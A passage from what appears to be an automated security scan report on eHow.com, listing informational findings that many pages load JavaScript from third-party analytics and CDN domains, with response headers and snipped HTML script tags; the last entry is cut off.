Host:	http://www.ehow.com
Path:	/plants/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70735

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Plants - How To Information | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.505. http://www.ehow.com/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/privacy.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49059

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Privacy Policy | eHow.com</title>
       <meta charse
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.506. http://www.ehow.com/real-estate-and-investment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/real-estate-and-investment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71097

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Real Estate & Investment - How To Information | e
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.507. http://www.ehow.com/recipes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/recipes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72694

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Recipes - How To Information | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.508. http://www.ehow.com/recreational-activities/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/recreational-activities/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70375

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Recreational Activities - How To Information | eH
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.509. http://www.ehow.com/relationships-and-family/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/relationships-and-family/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70622

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Relationships & Family - How To Information | eHo
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.510. http://www.ehow.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/search.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: UserView=List; expires=Thu, 02-Feb-2012 15:14:51 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30762

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title> | eHow Search</title>
       <meta charset="UTF-8" /
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.511. http://www.ehow.com/share.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/share.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:02 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25898

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Share, Comment, Show & Tell, Write | eHow.com
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.512. http://www.ehow.com/site-map.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/site-map.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25498

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Sitemap | eHow.com</title>
       <meta charset="UTF-
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.513. http://www.ehow.com/sitemap.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/sitemap.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21945

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title><br /><div><b>Holiday Guides</b></div></title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.514. http://www.ehow.com/sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71057

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Sports - How To Information | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.515. http://www.ehow.com/terms_use.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/terms_use.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73073

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Terms of Use | eHow.com</title>
       <meta charset=
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.516. http://www.ehow.com/topic_227_take-pictures.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_227_take-pictures.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=227; expires=Thu, 02-Feb-2012 15:16:17 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37705

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Take Photos - Basics of Photography | eHow.com
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.517. http://www.ehow.com/topic_2488_lose-weight.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_2488_lose-weight.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=2488; expires=Thu, 02-Feb-2012 15:16:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43013

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Lose Weight | eHow.com
</title>
       <meta chars
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.518. http://www.ehow.com/topic_253_lose-weight-now.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_253_lose-weight-now.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=253; expires=Thu, 02-Feb-2012 15:16:26 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52813

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Lose Weight Now - Weight Loss Diets | eHow.com
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.519. http://www.ehow.com/topic_3493_lose-weight-dieting.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3493_lose-weight-dieting.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:24 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3493; expires=Thu, 02-Feb-2012 15:16:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45235

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Lose Weight Without Dieting | eHow.com
</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.520. http://www.ehow.com/topic_363_winter-sports.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_363_winter-sports.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=363; expires=Thu, 02-Feb-2012 15:14:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49393

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Hit the Slopes for Winter Fitness - Downhill sk
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.521. http://www.ehow.com/topic_3818_flu-guide.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3818_flu-guide.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3818; expires=Thu, 02-Feb-2012 15:16:30 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43696

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Flu Guide | eHow.com
</title>
       <meta charset
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.522. http://www.ehow.com/topic_3990_home-security-systems-guide.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3990_home-security-systems-guide.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
